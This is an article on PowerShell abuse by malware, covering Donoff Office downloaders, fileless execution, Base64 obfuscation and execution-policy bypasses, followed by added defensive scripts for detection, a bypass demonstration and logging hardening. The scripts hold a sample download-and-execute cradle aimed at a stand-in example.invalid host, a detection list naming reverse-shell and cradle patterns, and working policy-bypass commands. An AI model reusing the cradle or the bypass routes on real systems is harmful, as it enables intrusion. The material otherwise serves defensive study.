Windows PowerShell: An Attack Vector Increasingly Popular With Cyber Criminals
The cyber threat landscape has seen a 117% increase in malware using PowerShell, driven by the proliferation of malicious Donoff files. Over the same period, new malware using Microsoft Office is up 103% on the first-quarter figures, with noticeable growth coming from documents that invoke PowerShell, chiefly Donoff. Donoff files are Microsoft Office downloaders: they use the Windows command shell to launch PowerShell, which then downloads and executes further malicious files. According to McAfee, Donoff was instrumental in the 689% increase in new malicious PowerShell code in Q1 2020.
Windows PowerShell is a .NET-based command-line shell and scripting language that helps system administrators automate the management of Windows systems. It is a powerful tool used by many administrators and users to automate and control OS functions. That same power to enable or disable OS functions naturally attracts threat actors.
Stealth is another attraction of PowerShell attacks. Traditional defences assume that malware arrives as an application: executable code that has to be stored somewhere on disk and run, and is therefore likely to trigger signature- or behaviour-based detection tools. Fileless attacks, by contrast, keep the malicious code in memory to evade on-disk scanners and traditional detection methods. PowerShell, a legitimate Microsoft tool, provides a convenient cover for operating unnoticed: the attacker only needs to pull the payload into the PowerShell process and begin the infection from there.
Attackers can also use obfuscation to evade detection, for example by passing the script as Base64 through the -EncodedCommand argument, or by splitting and concatenating strings so that no recognisable keyword appears on the command line. Remote download and execution is another powerful evasion technique: a short "download cradle" fetches a script from a remote server and runs it directly in memory, so the script is never written to the user's disk.
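The following is an added example, not code from the original article, showing the defender's side of the two techniques just described: it decodes a Base64 -EncodedCommand argument back to the script it carries and flags the download-cradle and obfuscation patterns mentioned above. The sample command line is constructed in the script itself, and the URL uses the reserved example.invalid domain, which never resolves, so nothing is downloaded or executed. The indicator list and the "two or more hits" threshold are assumptions to be tuned against your own baseline.

```powershell
# Added example: decode an -EncodedCommand payload and flag download-and-execute
# patterns. Sample command line is constructed below; nothing is fetched or run.

function Get-DecodedPowerShellCommand {
    param([Parameter(Mandatory)][string]$CommandLine)

    # powershell.exe accepts -EncodedCommand and its prefixes (-enc, -ec, -e);
    # the argument is Base64 over the UTF-16LE bytes of the script text.
    if ($CommandLine -match '(?i)-e(nc(odedcommand)?|c)?\s+(?<b64>[A-Za-z0-9+/=]{16,})') {
        $bytes = [Convert]::FromBase64String($Matches.b64)
        return [Text.Encoding]::Unicode.GetString($bytes)
    }
    return $CommandLine   # nothing encoded; inspect the command line as-is
}

function Test-SuspiciousPowerShell {
    param([Parameter(Mandatory)][string]$CommandLine)

    $decoded = Get-DecodedPowerShellCommand -CommandLine $CommandLine

    # Assumed indicator list (regex => description); extend from your own telemetry.
    $indicators = [ordered]@{
        'DownloadString|DownloadFile'     = 'WebClient download cradle'
        'Invoke-WebRequest|\biwr\b'       = 'web download'
        '\bIEX\b|Invoke-Expression'       = 'string executed as code'
        'FromBase64String'                = 'nested Base64 layer'
        '-w(indowstyle)?\s+hidden'        = 'hidden window'
        '-nop\b|-noprofile'               = 'profile skipped'
        'Net\.Sockets\.TCPClient'         = 'raw socket (reverse shell pattern)'
    }

    # Flags found in the outer command line (-nop, -w hidden) are checked too,
    # because they never appear inside the decoded script.
    $hits = foreach ($pattern in $indicators.Keys) {
        if ($decoded -match "(?i)$pattern" -or $CommandLine -match "(?i)$pattern") {
            $indicators[$pattern]
        }
    }

    [pscustomobject]@{
        Decoded    = $decoded
        Indicators = @($hits)
        Suspicious = (@($hits).Count -ge 2)   # crude threshold; tune to your baseline
    }
}

# Constructed sample: a typical cradle wrapped in -enc, as it appears in process
# creation telemetry. example.invalid is a reserved name and never resolves.
$cradle = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage2.ps1")'
$b64    = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))
$sample = "powershell.exe -nop -w hidden -enc $b64"

Test-SuspiciousPowerShell -CommandLine $sample | Format-List
```

Run against real data, `$sample` would come from Sysmon event 1 or Security event 4688 command lines; the point of decoding first is that the cradle keywords are invisible in the raw Base64 blob, so any rule that only inspects the outer command line misses them.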
Which Opens Up A Wide Range Of Possibilities
Once access to the system is established, attackers have a wide choice of options, because PowerShell gives them access to a multitude of system functions, including:
- A robust scripting environment,
- Direct access to network sockets,
- The ability to enable or disable protocols,
- The ability to assemble malicious binaries dynamically in memory,
- Direct access to the Win32 application programming interface (API),
- Direct interfacing with Windows Management Instrumentation (WMI),
- The ability to invoke code dynamically at runtime,
- Easy access to cryptographic libraries, for instance hashing and encryption algorithms,
- The ability to hook managed code,
- Direct access to COM objects.
Propagation And Obfuscation Techniques At Work
Once inside the OS, attackers have a wide choice of infection options using malicious scripts. Privilege escalation is a common step in running malware through the PowerShell command line. Although PowerShell's default execution policy refuses to run script files, that policy is not a security boundary: there are several ways around it, such as passing the code through the "-Command" or "-EncodedCommand" arguments, piping it into the interpreter on standard input, or launching powershell.exe with "-ExecutionPolicy Bypass".
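The following is an added example, not part of the original article, that demonstrates the point about the execution policy. It assumes Windows PowerShell 5.1 on Windows, writes a throwaway script to the temp folder (a path constructed here), sets the policy to Restricted for the current process only (no administrator rights needed), and shows that the file is refused while the same content still runs through every "-Command"-style route. Because the process-scope policy is carried in the PSExecutionPolicyPreference environment variable, child powershell.exe processes inherit it, which is what makes the contrast visible.

```powershell
# Added example: the execution policy governs only how .ps1 files are invoked.
# Throwaway script path is constructed here; nothing is downloaded.

$script = Join-Path $env:TEMP 'ep-demo.ps1'
Set-Content -Path $script -Value 'Write-Output ("script ran in process " + $PID)'

# Restrict the policy for this process only (stored in $env:PSExecutionPolicyPreference,
# so child powershell.exe processes inherit it).
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Restricted -Force
Write-Output "policy now: $(Get-ExecutionPolicy)"

# 1. Invoking the file is refused, both in this session and in a child process.
try   { & $script }
catch { $msg = ($_.Exception.Message -split "`n")[0]; Write-Output "blocked here: $msg" }
powershell.exe -NoProfile -File $script   # child prints the same refusal

# 2. Each of the following runs the identical content anyway. None of them
#    involves a vulnerability; the policy was never designed to stop this.
powershell.exe -NoProfile -ExecutionPolicy Bypass -File $script

powershell.exe -NoProfile -Command 'Write-Output ("inline -Command ran in process " + $PID)'

Get-Content $script -Raw | powershell.exe -NoProfile -Command -   # script on stdin

$enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes((Get-Content $script -Raw)))
powershell.exe -NoProfile -EncodedCommand $enc

Remove-Item $script
```

Each "ran in process" line carries a different PID, confirming that a fresh interpreter executed the content regardless of the inherited Restricted policy. The practical consequence for defenders is that execution policy belongs in the "reduce accidental misuse" column; blocking deliberate abuse needs application control (AppLocker or WDAC), Constrained Language Mode and logging instead.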
Propagation techniques rely on running scripts, as well as on access to network protocols and sockets. Embedded in email attachments with extensions such as .wsf, .html, .pdf and .js, or in everyday Office formats such as .pptx and .xlsx, scripts are used to launch payloads. Another common propagation method is Office macros. This is a specialised technique because the macro itself need not contain the malicious code: the payload can be stored elsewhere in the document, in its metadata or in the cells of an Excel sheet, for instance, and the macro merely reads and executes it. Because the macro commands run directly on that stored content, a protection tool that scans only the macro code sees nothing abnormal.
The main problem in combating attacks through PowerShell is that security software generally treats it as a trusted application, since it is part of Windows. It is therefore crucial to prevent these techniques at the source. A direct approach is to harden PowerShell's settings, secure the processes that are allowed to execute it, and keep Windows and its tools updated to recent versions, which add script block logging, the Antimalware Scan Interface (AMSI) and Constrained Language Mode that older releases lack.
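The following is an added example, not from the original article, of what "hardening PowerShell's settings" looks like in practice. It audits the controls that matter against the techniques described on this page (script block logging, module logging, transcription, the old PowerShell 2.0 engine that has none of them, and the session's language mode), and provides a function that turns the logging on through the same registry keys the corresponding Group Policy settings write. The registry paths, value names and event ID 4104 are Microsoft's documented ones; the transcript output directory is an assumed path and should sit on a location whose ACL ordinary users cannot write to or read from. The remediation function changes machine-wide policy and needs an elevated shell, so it only runs when called explicitly.

```powershell
# Added example: audit and enable the PowerShell logging controls that defeat
# in-memory and obfuscated attacks. Registry paths are the documented policy keys.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Get-PolicyValue {
    param([string]$SubKey, [string]$Name)
    $key = Join-Path $PolicyRoot $SubKey
    if (Test-Path $key) { (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).$Name }
}

function Get-PowerShellHardeningStatus {
    # Get-WindowsOptionalFeature needs elevation; report 'unknown' rather than guess.
    $v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 -ErrorAction SilentlyContinue
    [pscustomobject]@{
        ScriptBlockLogging = (Get-PolicyValue ScriptBlockLogging EnableScriptBlockLogging) -eq 1
        ModuleLogging      = (Get-PolicyValue ModuleLogging EnableModuleLogging) -eq 1
        Transcription      = (Get-PolicyValue Transcription EnableTranscripting) -eq 1
        PSv2Engine         = if ($v2) { $v2.State } else { 'unknown (run elevated)' }
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode   # FullLanguage unless locked down
        ExecutionPolicy    = Get-ExecutionPolicy
    }
}

function Enable-PowerShellLogging {
    # Requires an elevated shell. Mirrors Group Policy: Administrative Templates >
    # Windows Components > Windows PowerShell.
    $sbl = Join-Path $PolicyRoot 'ScriptBlockLogging'
    New-Item -Path $sbl -Force | Out-Null
    Set-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -Value 1 -Type DWord

    $mod = Join-Path $PolicyRoot 'ModuleLogging'
    New-Item -Path (Join-Path $mod 'ModuleNames') -Force | Out-Null
    Set-ItemProperty -Path $mod -Name EnableModuleLogging -Value 1 -Type DWord
    New-ItemProperty -Path (Join-Path $mod 'ModuleNames') -Name '*' -Value '*' -PropertyType String -Force | Out-Null

    $tr = Join-Path $PolicyRoot 'Transcription'
    New-Item -Path $tr -Force | Out-Null
    Set-ItemProperty -Path $tr -Name EnableTranscripting -Value 1 -Type DWord
    Set-ItemProperty -Path $tr -Name EnableInvocationHeader -Value 1 -Type DWord
    Set-ItemProperty -Path $tr -Name OutputDirectory -Value 'C:\PSTranscripts'   # assumed path; lock down its ACL
}

function Get-RecentScriptBlockEvents {
    param([int]$Newest = 20)
    # Event 4104 records the script block text as the engine compiled it, i.e. after
    # Base64 or string-concatenation obfuscation has already been undone.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $Newest -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, @{ n = 'ScriptBlock'; e = { $_.Properties[2].Value } }
}

Get-PowerShellHardeningStatus
```

Run the audit first; if it reports the logging controls as false, call Enable-PowerShellLogging from an elevated prompt and then use Get-RecentScriptBlockEvents to confirm 4104 events are arriving. Because the PowerShell 2.0 engine predates all of these controls, a PSv2Engine value of Enabled means an attacker can simply start powershell.exe -Version 2 to avoid them, and the feature should be removed with Disable-WindowsOptionalFeature.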